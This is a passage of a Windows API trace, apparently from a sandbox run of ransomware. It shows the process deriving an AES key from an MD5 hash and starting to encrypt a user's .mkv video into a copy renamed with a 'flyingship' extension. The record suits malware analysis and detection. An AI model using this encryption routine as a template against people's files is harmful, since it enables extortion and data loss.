3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.787] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CCOSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OSsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SsWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sWXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WXcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XcEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cEV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EV8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZF\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\S8EN.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.789] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.789] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0192.789] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.789] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.789] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.789] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.789] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.789] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.789] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde8559c0, ftCreationTime.dwHighDateTime=0x1d5e560, ftLastAccessTime.dwLowDateTime=0x460bbc0, ftLastAccessTime.dwHighDateTime=0x1d5e69d, ftLastWriteTime.dwLowDateTime=0x460bbc0, ftLastWriteTime.dwHighDateTime=0x1d5e69d, nFileSizeHigh=0x0, nFileSizeLow=0x71e4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="S8EN.mkv", cAlternateFileName="")) returned 0x90af58 [0192.790] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.790] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.790] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.790] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0192.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0192.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.790] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0192.792] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0192.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.792] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0192.792] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.792] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.792] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0192.792] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0192.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.793] CryptHashData (hHash=0x90ae18, pbData=0x8df0a0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0192.793] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.794] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.794] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0192.794] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.794] CryptDestroyHash (hHash=0x90ae18) returned 1 [0192.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\s8en.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.796] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.796] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0192.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.796] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0192.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0192.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0192.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.797] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0192.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.798] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0192.798] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf")) returned 0x10 [0192.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0192.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0192.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0192.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0192.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0192.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0192.799] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0192.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0192.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0192.800] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ccosswxcev8zf\\s8en.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0192.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0192.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0192.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0192.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0192.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0192.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.801] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0192.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0192.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0192.802] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 